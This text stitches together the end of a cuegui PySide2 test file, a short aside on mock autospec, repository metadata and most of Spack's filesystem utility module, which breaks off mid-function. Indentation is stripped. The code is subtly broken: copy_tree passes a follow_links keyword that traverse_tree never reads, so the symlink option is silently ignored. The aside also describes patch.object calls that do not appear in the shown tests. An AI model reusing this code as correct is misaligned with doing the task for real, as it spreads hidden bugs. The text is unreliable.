mouse_position = PySide2.QtCore.QPoint()
self.frameMonitorTree.contextMenuEvent(
PySide2.QtGui.QContextMenuEvent(
PySide2.QtGui.QContextMenuEvent.Reason.Mouse, mouse_position, mouse_position))
execMock.assert_called_with(mouse_position)
class FrameWidgetItemTests(unittest.TestCase):
@mock.patch('opencue.cuebot.Cuebot.getStub', new=mock.Mock())
def setUp(self):
self.host_name = 'arbitrary-hostname'
self.dispatch_order = 285
self.state = opencue.compiled_proto.job_pb2.RUNNING
self.frame = opencue.wrappers.frame.Frame(
opencue.compiled_proto.job_pb2.Frame(
name='frame1',
last_resource='{}/foo'.format(self.host_name),
dispatch_order=self.dispatch_order,
state=self.state,
checkpoint_state=opencue.compiled_proto.job_pb2.ENABLED))
        # The widget must be kept in a variable, otherwise it gets garbage-collected before the tests can run.
parentWidget = PySide2.QtWidgets.QWidget()
self.frameWidgetItem = cuegui.FrameMonitorTree.FrameWidgetItem(
self.frame,
cuegui.FrameMonitorTree.FrameMonitorTree(parentWidget),
opencue.wrappers.job.Job(opencue.compiled_proto.job_pb2.Job(id='unused-job-id')))
def test_data(self):
cuegui.FrameMonitorTree.LOCALRESOURCE = '{}/'.format(self.host_name)
dispatch_order_col = 0
self.assertEqual(
self.dispatch_order,
self.frameWidgetItem.data(dispatch_order_col, PySide2.QtCore.Qt.DisplayRole))
self.assertEqual(
cuegui.Style.ColorTheme.COLOR_JOB_FOREGROUND,
self.frameWidgetItem.data(dispatch_order_col, PySide2.QtCore.Qt.ForegroundRole))
self.assertEqual(
cuegui.FrameMonitorTree.QCOLOR_BLACK,
self.frameWidgetItem.data(
cuegui.FrameMonitorTree.STATUS_COLUMN, PySide2.QtCore.Qt.ForegroundRole))
self.assertEqual(
cuegui.FrameMonitorTree.QCOLOR_GREEN,
self.frameWidgetItem.data(
cuegui.FrameMonitorTree.PROC_COLUMN, PySide2.QtCore.Qt.ForegroundRole))
self.assertEqual(
cuegui.Constants.RGB_FRAME_STATE[self.state],
self.frameWidgetItem.data(
cuegui.FrameMonitorTree.STATUS_COLUMN, PySide2.QtCore.Qt.BackgroundRole))
self.assertEqual(
PySide2.QtGui.QIcon,
self.frameWidgetItem.data(
cuegui.FrameMonitorTree.CHECKPOINT_COLUMN,
PySide2.QtCore.Qt.DecorationRole).__class__)
self.assertEqual(
PySide2.QtCore.Qt.AlignCenter,
self.frameWidgetItem.data(
cuegui.FrameMonitorTree.STATUS_COLUMN, PySide2.QtCore.Qt.TextAlignmentRole))
self.assertEqual(
PySide2.QtCore.Qt.AlignRight,
self.frameWidgetItem.data(
cuegui.FrameMonitorTree.PROC_COLUMN, PySide2.QtCore.Qt.TextAlignmentRole))
self.assertEqual(
cuegui.Constants.TYPE_FRAME,
self.frameWidgetItem.data(dispatch_order_col, PySide2.QtCore.Qt.UserRole))
if __name__ == '__main__':
unittest.main()
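The tests above lean on mock.patch.object(..., autospec=True), which makes the
mock record self as an explicit first argument; a minimal standalone sketch of
that pattern (the Job class here is hypothetical):

import unittest
import mock

class Job(object):
    def getFrames(self):
        return []

class AutospecDemo(unittest.TestCase):
    @mock.patch.object(Job, 'getFrames', autospec=True)
    def test_self_is_recorded(self, getFramesMock):
        job = Job()
        job.getFrames()
        getFramesMock.assert_called_with(job)  # 'self' appears in the call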
avg_line_length: 39.360577
max_line_length: 113
alphanum_fraction: 0.702333
is_comment_constant_removed: true
is_sharp_comment_removed: true

hexsha: 1c4472d59ef9d2f4b7feaa9217800ab5af98d094
size: 54,950
ext: py
lang: Python
max_stars_repo_path: lib/spack/llnl/util/filesystem.py
max_stars_repo_name: BenCasses/spack
max_stars_repo_head_hexsha: 912dcd320a1ec624cc12986a4c0dd881276c925b
max_stars_repo_licenses: ["ECL-2.0", "Apache-2.0", "MIT-0", "MIT"]
max_stars_count: null
max_stars_repo_stars_event_min_datetime: null
max_stars_repo_stars_event_max_datetime: null
max_issues_repo_path: lib/spack/llnl/util/filesystem.py
max_issues_repo_name: BenCasses/spack
max_issues_repo_head_hexsha: 912dcd320a1ec624cc12986a4c0dd881276c925b
max_issues_repo_licenses: ["ECL-2.0", "Apache-2.0", "MIT-0", "MIT"]
max_issues_count: null
max_issues_repo_issues_event_min_datetime: null
max_issues_repo_issues_event_max_datetime: null
max_forks_repo_path: lib/spack/llnl/util/filesystem.py
max_forks_repo_name: BenCasses/spack
max_forks_repo_head_hexsha: 912dcd320a1ec624cc12986a4c0dd881276c925b
max_forks_repo_licenses: ["ECL-2.0", "Apache-2.0", "MIT-0", "MIT"]
max_forks_count: null
max_forks_repo_forks_event_min_datetime: null
max_forks_repo_forks_event_max_datetime: null
# Copyright 2013-2020 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
import collections
import errno
import hashlib
import glob
import grp
import itertools
import numbers
import os
import pwd
import re
import shutil
import stat
import sys
import tempfile
from contextlib import contextmanager
import six
from llnl.util import tty
from llnl.util.lang import dedupe, memoized
from spack.util.executable import Executable
__all__ = [
'FileFilter',
'FileList',
'HeaderList',
'LibraryList',
'ancestor',
'can_access',
'change_sed_delimiter',
'copy_mode',
'filter_file',
'find',
'find_headers',
'find_all_headers',
'find_libraries',
'find_system_libraries',
'fix_darwin_install_name',
'force_remove',
'force_symlink',
'chgrp',
'chmod_x',
'copy',
'install',
'copy_tree',
'install_tree',
'is_exe',
'join_path',
'mkdirp',
'partition_path',
'prefixes',
'remove_dead_links',
'remove_directory_contents',
'remove_if_dead_link',
'remove_linked_tree',
'set_executable',
'set_install_permissions',
'touch',
'touchp',
'traverse_tree',
'unset_executable_mode',
'working_dir'
]
def path_contains_subdirectory(path, root):
norm_root = os.path.abspath(root).rstrip(os.path.sep) + os.path.sep
norm_path = os.path.abspath(path).rstrip(os.path.sep) + os.path.sep
return norm_path.startswith(norm_root)
def possible_library_filenames(library_names):
"""Given a collection of library names like 'libfoo', generate the set of
library filenames that may be found on the system (e.g. libfoo.so). This
generates the library filenames that may appear on any OS.
"""
lib_extensions = ['a', 'la', 'so', 'tbd', 'dylib']
return set(
'.'.join((lib, extension)) for lib, extension in
itertools.product(library_names, lib_extensions))
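# For example (following lib_extensions above; illustrative only):
#   possible_library_filenames(['libfoo']) ==
#       {'libfoo.a', 'libfoo.la', 'libfoo.so', 'libfoo.tbd', 'libfoo.dylib'}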
def paths_containing_libs(paths, library_names):
"""Given a collection of filesystem paths, return the list of paths that
which include one or more of the specified libraries.
"""
required_lib_fnames = possible_library_filenames(library_names)
rpaths_to_include = []
for path in paths:
fnames = set(os.listdir(path))
if fnames & required_lib_fnames:
rpaths_to_include.append(path)
return rpaths_to_include
def same_path(path1, path2):
norm1 = os.path.abspath(path1).rstrip(os.path.sep)
norm2 = os.path.abspath(path2).rstrip(os.path.sep)
return norm1 == norm2
def filter_file(regex, repl, *filenames, **kwargs):
r"""Like sed, but uses python regular expressions.
Filters every line of each file through regex and replaces the file
with a filtered version. Preserves mode of filtered files.
As with re.sub, ``repl`` can be either a string or a callable.
If it is a callable, it is passed the match object and should
return a suitable replacement string. If it is a string, it
can contain ``\1``, ``\2``, etc. to represent back-substitution
as sed would allow.
Parameters:
regex (str): The regular expression to search for
repl (str): The string to replace matches with
*filenames: One or more files to search and replace
Keyword Arguments:
        string (bool): Treat regex as a plain string. Default is False
backup (bool): Make backup file(s) suffixed with ``~``. Default is True
ignore_absent (bool): Ignore any files that don't exist.
Default is False
stop_at (str): Marker used to stop scanning the file further. If a text
line matches this marker filtering is stopped and the rest of the
file is copied verbatim. Default is to filter until the end of the
file.
"""
string = kwargs.get('string', False)
backup = kwargs.get('backup', True)
ignore_absent = kwargs.get('ignore_absent', False)
stop_at = kwargs.get('stop_at', None)
# Allow strings to use \1, \2, etc. for replacement, like sed
if not callable(repl):
unescaped = repl.replace(r'\\', '\\')
def replace_groups_with_groupid(m):
def groupid_to_group(x):
return m.group(int(x.group(1)))
return re.sub(r'\\([1-9])', groupid_to_group, unescaped)
repl = replace_groups_with_groupid
if string:
regex = re.escape(regex)
for filename in filenames:
msg = 'FILTER FILE: {0} [replacing "{1}"]'
tty.debug(msg.format(filename, regex))
backup_filename = filename + "~"
tmp_filename = filename + ".spack~"
if ignore_absent and not os.path.exists(filename):
msg = 'FILTER FILE: file "{0}" not found. Skipping to next file.'
tty.debug(msg.format(filename))
continue
# Create backup file. Don't overwrite an existing backup
# file in case this file is being filtered multiple times.
if not os.path.exists(backup_filename):
shutil.copy(filename, backup_filename)
# Create a temporary file to read from. We cannot use backup_filename
# in case filter_file is invoked multiple times on the same file.
shutil.copy(filename, tmp_filename)
try:
extra_kwargs = {}
if sys.version_info > (3, 0):
extra_kwargs = {'errors': 'surrogateescape'}
# Open as a text file and filter until the end of the file is
# reached or we found a marker in the line if it was specified
with open(tmp_filename, mode='r', **extra_kwargs) as input_file:
with open(filename, mode='w', **extra_kwargs) as output_file:
# Using iter and readline is a workaround needed not to
# disable input_file.tell(), which will happen if we call
# input_file.next() implicitly via the for loop
for line in iter(input_file.readline, ''):
if stop_at is not None:
current_position = input_file.tell()
if stop_at == line.strip():
output_file.write(line)
break
filtered_line = re.sub(regex, repl, line)
output_file.write(filtered_line)
else:
current_position = None
# If we stopped filtering at some point, reopen the file in
# binary mode and copy verbatim the remaining part
if current_position and stop_at:
with open(tmp_filename, mode='rb') as input_file:
input_file.seek(current_position)
with open(filename, mode='ab') as output_file:
output_file.writelines(input_file.readlines())
except BaseException:
# clean up the original file on failure.
shutil.move(backup_filename, filename)
raise
finally:
os.remove(tmp_filename)
if not backup and os.path.exists(backup_filename):
os.remove(backup_filename)
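# Illustrative calls (hypothetical file names and patterns):
#   filter_file(r'^CC\s*=.*', 'CC = cc', 'Makefile')             # regex form
#   filter_file('@PREFIX@', '/usr', 'config.h', string=True)     # literal form
#   filter_file('-g', '', 'flags.mk', stop_at='# end of flags')  # partial scan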
class FileFilter(object):
"""Convenience class for calling ``filter_file`` a lot."""
def __init__(self, *filenames):
self.filenames = filenames
def filter(self, regex, repl, **kwargs):
return filter_file(regex, repl, *self.filenames, **kwargs)
def change_sed_delimiter(old_delim, new_delim, *filenames):
"""Find all sed search/replace commands and change the delimiter.
e.g., if the file contains seds that look like ``'s///'``, you can
call ``change_sed_delimiter('/', '@', file)`` to change the
delimiter to ``'@'``.
Note that this routine will fail if the delimiter is ``'`` or ``"``.
Handling those is left for future work.
Parameters:
old_delim (str): The delimiter to search for
new_delim (str): The delimiter to replace with
*filenames: One or more files to search and replace
"""
assert(len(old_delim) == 1)
assert(len(new_delim) == 1)
# TODO: handle these cases one day?
assert(old_delim != '"')
assert(old_delim != "'")
assert(new_delim != '"')
assert(new_delim != "'")
whole_lines = "^s@([^@]*)@(.*)@[gIp]$"
whole_lines = whole_lines.replace('@', old_delim)
single_quoted = r"'s@((?:\\'|[^@'])*)@((?:\\'|[^'])*)@[gIp]?'"
single_quoted = single_quoted.replace('@', old_delim)
double_quoted = r'"s@((?:\\"|[^@"])*)@((?:\\"|[^"])*)@[gIp]?"'
double_quoted = double_quoted.replace('@', old_delim)
repl = r's@\1@\2@g'
repl = repl.replace('@', new_delim)
for f in filenames:
filter_file(whole_lines, repl, f)
filter_file(single_quoted, "'%s'" % repl, f)
filter_file(double_quoted, '"%s"' % repl, f)
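# For example, change_sed_delimiter('/', '@', 'install.sh') (hypothetical file)
# would rewrite a command such as:
#   sed "s/foo/bar/g"   ->   sed "s@foo@bar@g"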
def set_install_permissions(path):
"""Set appropriate permissions on the installed file."""
# If this points to a file maintained in a Spack prefix, it is assumed that
# this function will be invoked on the target. If the file is outside a
# Spack-maintained prefix, the permissions should not be modified.
if os.path.islink(path):
return
if os.path.isdir(path):
os.chmod(path, 0o755)
else:
os.chmod(path, 0o644)
def group_ids(uid=None):
"""Get group ids that a uid is a member of.
Arguments:
uid (int): id of user, or None for current user
Returns:
(list of int): gids of groups the user is a member of
"""
if uid is None:
uid = os.getuid()
user = pwd.getpwuid(uid).pw_name
return [g.gr_gid for g in grp.getgrall() if user in g.gr_mem]
def chgrp(path, group):
"""Implement the bash chgrp function on a single path"""
if isinstance(group, six.string_types):
gid = grp.getgrnam(group).gr_gid
else:
gid = group
os.chown(path, -1, gid)
def chmod_x(entry, perms):
"""Implements chmod, treating all executable bits as set using the chmod
utility's `+X` option.
"""
mode = os.stat(entry).st_mode
if os.path.isfile(entry):
if not mode & (stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH):
perms &= ~stat.S_IXUSR
perms &= ~stat.S_IXGRP
perms &= ~stat.S_IXOTH
os.chmod(entry, perms)
def copy_mode(src, dest):
"""Set the mode of dest to that of src unless it is a link.
"""
if os.path.islink(dest):
return
src_mode = os.stat(src).st_mode
dest_mode = os.stat(dest).st_mode
if src_mode & stat.S_IXUSR:
dest_mode |= stat.S_IXUSR
if src_mode & stat.S_IXGRP:
dest_mode |= stat.S_IXGRP
if src_mode & stat.S_IXOTH:
dest_mode |= stat.S_IXOTH
os.chmod(dest, dest_mode)
def unset_executable_mode(path):
mode = os.stat(path).st_mode
mode &= ~stat.S_IXUSR
mode &= ~stat.S_IXGRP
mode &= ~stat.S_IXOTH
os.chmod(path, mode)
def copy(src, dest, _permissions=False):
"""Copies the file *src* to the file or directory *dest*.
If *dest* specifies a directory, the file will be copied into *dest*
using the base filename from *src*.
Parameters:
src (str): the file to copy
dest (str): the destination file or directory
_permissions (bool): for internal use only
"""
if _permissions:
tty.debug('Installing {0} to {1}'.format(src, dest))
else:
tty.debug('Copying {0} to {1}'.format(src, dest))
# Expand dest to its eventual full path if it is a directory.
if os.path.isdir(dest):
dest = join_path(dest, os.path.basename(src))
shutil.copy(src, dest)
if _permissions:
set_install_permissions(dest)
copy_mode(src, dest)
def install(src, dest):
"""Installs the file *src* to the file or directory *dest*.
Same as :py:func:`copy` with the addition of setting proper
permissions on the installed file.
Parameters:
src (str): the file to install
dest (str): the destination file or directory
"""
copy(src, dest, _permissions=True)
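# Illustrative calls (hypothetical paths):
#   copy('README', '/tmp/stage/')          # plain copy into a directory
#   install('README', '/opt/pkg/share/')   # copy + install permissions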
def resolve_link_target_relative_to_the_link(link):
"""
os.path.isdir uses os.path.exists, which for links will check
the existence of the link target. If the link target is relative to
the link, we need to construct a pathname that is valid from
our cwd (which may not be the same as the link's directory)
"""
target = os.readlink(link)
if os.path.isabs(target):
return target
link_dir = os.path.dirname(os.path.abspath(link))
return os.path.join(link_dir, target)
def copy_tree(src, dest, symlinks=True, ignore=None, _permissions=False):
"""Recursively copy an entire directory tree rooted at *src*.
If the destination directory *dest* does not already exist, it will
be created as well as missing parent directories.
If *symlinks* is true, symbolic links in the source tree are represented
as symbolic links in the new tree and the metadata of the original links
will be copied as far as the platform allows; if false, the contents and
metadata of the linked files are copied to the new tree.
If *ignore* is set, then each path relative to *src* will be passed to
this function; the function returns whether that path should be skipped.
Parameters:
src (str): the directory to copy
dest (str): the destination directory
symlinks (bool): whether or not to preserve symlinks
ignore (function): function indicating which files to ignore
_permissions (bool): for internal use only
"""
if _permissions:
tty.debug('Installing {0} to {1}'.format(src, dest))
else:
tty.debug('Copying {0} to {1}'.format(src, dest))
abs_src = os.path.abspath(src)
if not abs_src.endswith(os.path.sep):
abs_src += os.path.sep
abs_dest = os.path.abspath(dest)
if not abs_dest.endswith(os.path.sep):
abs_dest += os.path.sep
# Stop early to avoid unnecessary recursion if being asked to copy from a
# parent directory.
if abs_dest.startswith(abs_src):
raise ValueError('Cannot copy ancestor directory {0} into {1}'.
format(abs_src, abs_dest))
mkdirp(dest)
for s, d in traverse_tree(abs_src, abs_dest, order='pre',
                              follow_links=not symlinks,
ignore=ignore,
follow_nonexisting=True):
if os.path.islink(s):
link_target = resolve_link_target_relative_to_the_link(s)
if symlinks:
target = os.readlink(s)
if os.path.isabs(target):
new_target = re.sub(abs_src, abs_dest, target)
if new_target != target:
tty.debug("Redirecting link {0} to {1}"
.format(target, new_target))
target = new_target
os.symlink(target, d)
elif os.path.isdir(link_target):
mkdirp(d)
else:
shutil.copyfile(s, d)
else:
if os.path.isdir(s):
mkdirp(d)
else:
shutil.copy2(s, d)
if _permissions:
set_install_permissions(d)
copy_mode(s, d)
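# Illustrative call (hypothetical paths): copy a tree, skipping editor backups:
#   copy_tree('src/docs', '/tmp/stage/docs',
#             ignore=lambda rel_path: rel_path.endswith('~'))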
def install_tree(src, dest, symlinks=True, ignore=None):
"""Recursively install an entire directory tree rooted at *src*.
Same as :py:func:`copy_tree` with the addition of setting proper
permissions on the installed files and directories.
Parameters:
src (str): the directory to install
dest (str): the destination directory
symlinks (bool): whether or not to preserve symlinks
ignore (function): function indicating which files to ignore
"""
copy_tree(src, dest, symlinks=symlinks, ignore=ignore, _permissions=True)
def is_exe(path):
"""True if path is an executable file."""
return os.path.isfile(path) and os.access(path, os.X_OK)
def get_filetype(path_name):
"""
Return the output of file path_name as a string to identify file type.
"""
file = Executable('file')
file.add_default_env('LC_ALL', 'C')
output = file('-b', '-h', '%s' % path_name,
output=str, error=str)
return output.strip()
def chgrp_if_not_world_writable(path, group):
"""chgrp path to group if path is not world writable"""
mode = os.stat(path).st_mode
if not mode & stat.S_IWOTH:
chgrp(path, group)
def mkdirp(*paths, **kwargs):
"""Creates a directory, as well as parent directories if needed.
Arguments:
paths (str): paths to create with mkdirp
    Keyword Arguments:
mode (permission bits or None, optional): optional permissions to set
on the created directory -- use OS default if not provided
group (group name or None, optional): optional group for permissions of
final created directory -- use OS default if not provided. Only
used if world write permissions are not set
default_perms ('parents' or 'args', optional): The default permissions
that are set for directories that are not themselves an argument
for mkdirp. 'parents' means intermediate directories get the
permissions of their direct parent directory, 'args' means
intermediate get the same permissions specified in the arguments to
mkdirp -- default value is 'args'
"""
mode = kwargs.get('mode', None)
group = kwargs.get('group', None)
default_perms = kwargs.get('default_perms', 'args')
for path in paths:
if not os.path.exists(path):
try:
# detect missing intermediate folders
intermediate_folders = []
last_parent = ''
intermediate_path = os.path.dirname(path)
while intermediate_path:
if os.path.exists(intermediate_path):
last_parent = intermediate_path
break
intermediate_folders.append(intermediate_path)
intermediate_path = os.path.dirname(intermediate_path)
# create folders
os.makedirs(path)
# leaf folder permissions
if mode is not None:
os.chmod(path, mode)
if group:
chgrp_if_not_world_writable(path, group)
if mode is not None:
os.chmod(path, mode) # reset sticky grp bit post chgrp
# for intermediate folders, change mode just for newly created
# ones and if mode_intermediate has been specified, otherwise
# intermediate folders list is not populated at all and default
# OS mode will be used
if default_perms == 'args':
intermediate_mode = mode
intermediate_group = group
elif default_perms == 'parents':
stat_info = os.stat(last_parent)
intermediate_mode = stat_info.st_mode
intermediate_group = stat_info.st_gid
else:
msg = "Invalid value: '%s'. " % default_perms
msg += "Choose from 'args' or 'parents'."
raise ValueError(msg)
for intermediate_path in reversed(intermediate_folders):
if intermediate_mode is not None:
os.chmod(intermediate_path, intermediate_mode)
if intermediate_group is not None:
chgrp_if_not_world_writable(intermediate_path,
intermediate_group)
os.chmod(intermediate_path,
intermediate_mode) # reset sticky bit after
except OSError as e:
if e.errno != errno.EEXIST or not os.path.isdir(path):
raise e
elif not os.path.isdir(path):
raise OSError(errno.EEXIST, "File already exists", path)
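# Illustrative calls (hypothetical paths and group):
#   mkdirp('/tmp/a/b/c')                                  # like 'mkdir -p'
#   mkdirp('/srv/shared/data', mode=0o2770, group='devs',
#          default_perms='parents')  # intermediates inherit parent perms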
def force_remove(*paths):
"""Remove files without printing errors. Like ``rm -f``, does NOT
remove directories."""
for path in paths:
try:
os.remove(path)
except OSError:
pass
@contextmanager
def working_dir(dirname, **kwargs):
if kwargs.get('create', False):
mkdirp(dirname)
orig_dir = os.getcwd()
os.chdir(dirname)
try:
yield
finally:
os.chdir(orig_dir)
@contextmanager
def replace_directory_transaction(directory_name, tmp_root=None):
"""Moves a directory to a temporary space. If the operations executed
within the context manager don't raise an exception, the directory is
deleted. If there is an exception, the move is undone.
Args:
directory_name (path): absolute path of the directory name
tmp_root (path): absolute path of the parent directory where to create
the temporary
Returns:
temporary directory where ``directory_name`` has been moved
"""
# Check the input is indeed a directory with absolute path.
# Raise before anything is done to avoid moving the wrong directory
assert os.path.isdir(directory_name), \
'Invalid directory: ' + directory_name
assert os.path.isabs(directory_name), \
'"directory_name" must contain an absolute path: ' + directory_name
directory_basename = os.path.basename(directory_name)
if tmp_root is not None:
assert os.path.isabs(tmp_root)
tmp_dir = tempfile.mkdtemp(dir=tmp_root)
tty.debug('TEMPORARY DIRECTORY CREATED [{0}]'.format(tmp_dir))
shutil.move(src=directory_name, dst=tmp_dir)
tty.debug('DIRECTORY MOVED [src={0}, dest={1}]'.format(
directory_name, tmp_dir
))
try:
yield tmp_dir
except (Exception, KeyboardInterrupt, SystemExit):
# Delete what was there, before copying back the original content
if os.path.exists(directory_name):
shutil.rmtree(directory_name)
shutil.move(
src=os.path.join(tmp_dir, directory_basename),
dst=os.path.dirname(directory_name)
)
tty.debug('DIRECTORY RECOVERED [{0}]'.format(directory_name))
msg = 'the transactional move of "{0}" failed.'
raise RuntimeError(msg.format(directory_name))
else:
# Otherwise delete the temporary directory
shutil.rmtree(tmp_dir)
tty.debug('TEMPORARY DIRECTORY DELETED [{0}]'.format(tmp_dir))
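# Illustrative use (hypothetical path; rebuild() is a stand-in for real work):
#   with replace_directory_transaction('/opt/app/current'):
#       rebuild('/opt/app/current')  # on error the original tree is restored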
def hash_directory(directory, ignore=[]):
"""Hashes recursively the content of a directory.
Args:
directory (path): path to a directory to be hashed
Returns:
hash of the directory content
"""
assert os.path.isdir(directory), '"directory" must be a directory!'
md5_hash = hashlib.md5()
# Adapted from https://stackoverflow.com/a/3431835/771663
for root, dirs, files in os.walk(directory):
for name in sorted(files):
filename = os.path.join(root, name)
if filename not in ignore:
# TODO: if caching big files becomes an issue, convert this to
# TODO: read in chunks. Currently it's used only for testing
# TODO: purposes.
with open(filename, 'rb') as f:
md5_hash.update(f.read())
return md5_hash.hexdigest()
@contextmanager
def write_tmp_and_move(filename):
"""Write to a temporary file, then move into place."""
dirname = os.path.dirname(filename)
basename = os.path.basename(filename)
tmp = os.path.join(dirname, '.%s.tmp' % basename)
with open(tmp, 'w') as f:
yield f
shutil.move(tmp, filename)
@contextmanager
def open_if_filename(str_or_file, mode='r'):
"""Takes either a path or a file object, and opens it if it is a path.
If it's a file object, just yields the file object.
"""
if isinstance(str_or_file, six.string_types):
with open(str_or_file, mode) as f:
yield f
else:
yield str_or_file
def touch(path):
"""Creates an empty file at the specified path."""
perms = (os.O_WRONLY | os.O_CREAT | os.O_NONBLOCK | os.O_NOCTTY)
fd = None
try:
fd = os.open(path, perms)
os.utime(path, None)
finally:
if fd is not None:
os.close(fd)
def touchp(path):
"""Like ``touch``, but creates any parent directories needed for the file.
"""
mkdirp(os.path.dirname(path))
touch(path)
def force_symlink(src, dest):
try:
os.symlink(src, dest)
except OSError:
os.remove(dest)
os.symlink(src, dest)
def join_path(prefix, *args):
path = str(prefix)
for elt in args:
path = os.path.join(path, str(elt))
return path
def ancestor(dir, n=1):
"""Get the nth ancestor of a directory."""
parent = os.path.abspath(dir)
for i in range(n):
parent = os.path.dirname(parent)
return parent
def get_single_file(directory):
fnames = os.listdir(directory)
if len(fnames) != 1:
raise ValueError("Expected exactly 1 file, got {0}"
.format(str(len(fnames))))
return fnames[0]
@contextmanager
def temp_cwd():
tmp_dir = tempfile.mkdtemp()
try:
with working_dir(tmp_dir):
yield tmp_dir
finally:
shutil.rmtree(tmp_dir)
@contextmanager
def temp_rename(orig_path, temp_path):
same_path = os.path.realpath(orig_path) == os.path.realpath(temp_path)
if not same_path:
shutil.move(orig_path, temp_path)
try:
yield
finally:
if not same_path:
shutil.move(temp_path, orig_path)
def can_access(file_name):
"""True if we have read/write access to the file."""
return os.access(file_name, os.R_OK | os.W_OK)
def traverse_tree(source_root, dest_root, rel_path='', **kwargs):
"""Traverse two filesystem trees simultaneously.
Walks the LinkTree directory in pre or post order. Yields each
file in the source directory with a matching path from the dest
directory, along with whether the file is a directory.
e.g., for this tree::
root/
a/
file1
file2
b/
file3
When called on dest, this yields::
('root', 'dest')
('root/a', 'dest/a')
('root/a/file1', 'dest/a/file1')
('root/a/file2', 'dest/a/file2')
('root/b', 'dest/b')
('root/b/file3', 'dest/b/file3')
Keyword Arguments:
order (str): Whether to do pre- or post-order traversal. Accepted
values are 'pre' and 'post'
ignore (function): function indicating which files to ignore
follow_nonexisting (bool): Whether to descend into directories in
            ``src`` that do not exist in ``dest``. Default is True
        follow_symlinks (bool): Whether to descend into symlinks in ``src``
            (also accepted under the legacy spelling ``follow_link``)
"""
follow_nonexisting = kwargs.get('follow_nonexisting', True)
    follow_links = kwargs.get(
        'follow_symlinks', kwargs.get('follow_link', False))
# Yield in pre or post order?
order = kwargs.get('order', 'pre')
if order not in ('pre', 'post'):
raise ValueError("Order must be 'pre' or 'post'.")
# List of relative paths to ignore under the src root.
ignore = kwargs.get('ignore', None) or (lambda filename: False)
# Don't descend into ignored directories
if ignore(rel_path):
return
source_path = os.path.join(source_root, rel_path)
dest_path = os.path.join(dest_root, rel_path)
# preorder yields directories before children
if order == 'pre':
yield (source_path, dest_path)
for f in os.listdir(source_path):
source_child = os.path.join(source_path, f)
dest_child = os.path.join(dest_path, f)
rel_child = os.path.join(rel_path, f)
# Treat as a directory
# TODO: for symlinks, os.path.isdir looks for the link target. If the
# target is relative to the link, then that may not resolve properly
# relative to our cwd - see resolve_link_target_relative_to_the_link
if os.path.isdir(source_child) and (
follow_links or not os.path.islink(source_child)):
# When follow_nonexisting isn't set, don't descend into dirs
# in source that do not exist in dest
if follow_nonexisting or os.path.exists(dest_child):
tuples = traverse_tree(
source_root, dest_root, rel_child, **kwargs)
for t in tuples:
yield t
# Treat as a file.
elif not ignore(os.path.join(rel_path, f)):
yield (source_child, dest_child)
if order == 'post':
yield (source_path, dest_path)
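# Sketch: replicate a source tree's layout under a destination using the
# pre-order traversal above (paths are hypothetical). This mirrors the core
# of copy_tree without the symlink handling.
def _demo_traverse_tree(src, dst):
    for s, d in traverse_tree(src, dst, order='pre'):
        if os.path.isdir(s):
            mkdirp(d)
        else:
            shutil.copy2(s, d)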
def set_executable(path):
mode = os.stat(path).st_mode
if mode & stat.S_IRUSR:
mode |= stat.S_IXUSR
if mode & stat.S_IRGRP:
mode |= stat.S_IXGRP
if mode & stat.S_IROTH:
mode |= stat.S_IXOTH
os.chmod(path, mode)
def remove_empty_directories(root):
"""Ascend up from the leaves accessible from `root` and remove empty
directories.
Parameters:
root (str): path where to search for empty directories
"""
for dirpath, subdirs, files in os.walk(root, topdown=False):
for sd in subdirs:
sdp = os.path.join(dirpath, sd)
try:
os.rmdir(sdp)
except OSError:
pass
def remove_dead_links(root):
"""Recursively removes any dead link that is present in root.
Parameters:
root (str): path where to search for dead links
"""
for dirpath, subdirs, files in os.walk(root, topdown=False):
for f in files:
path = join_path(dirpath, f)
remove_if_dead_link(path)
def remove_if_dead_link(path):
"""Removes the argument if it is a dead link.
Parameters:
path (str): The potential dead link
"""
if os.path.islink(path) and not os.path.exists(path):
os.unlink(path)
def remove_linked_tree(path):
"""Removes a directory and its contents.
If the directory is a symlink, follows the link and removes the real
directory before removing the link.
Parameters:
path (str): Directory to be removed
"""
if os.path.exists(path):
if os.path.islink(path):
shutil.rmtree(os.path.realpath(path), True)
os.unlink(path)
else:
shutil.rmtree(path, True)
def fix_darwin_install_name(path):
"""Fix install name of dynamic libraries on Darwin to have full path.
There are two parts of this task:
1. Use ``install_name('-id', ...)`` to change install name of a single lib
2. Use ``install_name('-change', ...)`` to change the cross linking between
libs. The function assumes that all libraries are in one folder and
currently won't follow subfolders.
Parameters:
path (str): directory in which .dylib files are located
"""
libs = glob.glob(join_path(path, "*.dylib"))
for lib in libs:
# fix install name first:
install_name_tool = Executable('install_name_tool')
install_name_tool('-id', lib, lib)
otool = Executable('otool')
long_deps = otool('-L', lib, output=str).split('\n')
deps = [dep.partition(' ')[0][1::] for dep in long_deps[2:-1]]
# fix all dependencies:
for dep in deps:
for loc in libs:
# We really want to check for either
# dep == os.path.basename(loc) or
# dep == join_path(builddir, os.path.basename(loc)),
# but we don't know builddir (nor how symbolic links look
# in builddir). We thus only compare the basenames.
if os.path.basename(dep) == os.path.basename(loc):
install_name_tool('-change', dep, loc, lib)
break
def find(root, files, recursive=True):
"""Search for ``files`` starting from the ``root`` directory.
Like GNU/BSD find but written entirely in Python.
Examples:
.. code-block:: console
$ find /usr -name python
is equivalent to:
>>> find('/usr', 'python')
.. code-block:: console
$ find /usr/local/bin -maxdepth 1 -name python
is equivalent to:
>>> find('/usr/local/bin', 'python', recursive=False)
Accepts any glob characters accepted by fnmatch:
======= ====================================
Pattern Meaning
======= ====================================
* matches everything
? matches any single character
[seq] matches any character in ``seq``
[!seq] matches any character not in ``seq``
======= ====================================
Parameters:
root (str): The root directory to start searching from
        files (str or collections.Sequence): File name(s) to search for
        recursive (bool, optional): if False search only root folder,
if True descends top-down from the root. Defaults to True.
Returns:
list of strings: The files that have been found
"""
if isinstance(files, six.string_types):
files = [files]
if recursive:
return _find_recursive(root, files)
else:
return _find_non_recursive(root, files)
def _find_recursive(root, search_files):
# The variable here is **on purpose** a defaultdict. The idea is that
# we want to poke the filesystem as little as possible, but still maintain
# stability in the order of the answer. Thus we are recording each library
# found in a key, and reconstructing the stable order later.
found_files = collections.defaultdict(list)
# Make the path absolute to have os.walk also return an absolute path
root = os.path.abspath(root)
for path, _, list_files in os.walk(root):
for search_file in search_files:
matches = glob.glob(os.path.join(path, search_file))
matches = [os.path.join(path, x) for x in matches]
found_files[search_file].extend(matches)
answer = []
for search_file in search_files:
answer.extend(found_files[search_file])
return answer
def _find_non_recursive(root, search_files):
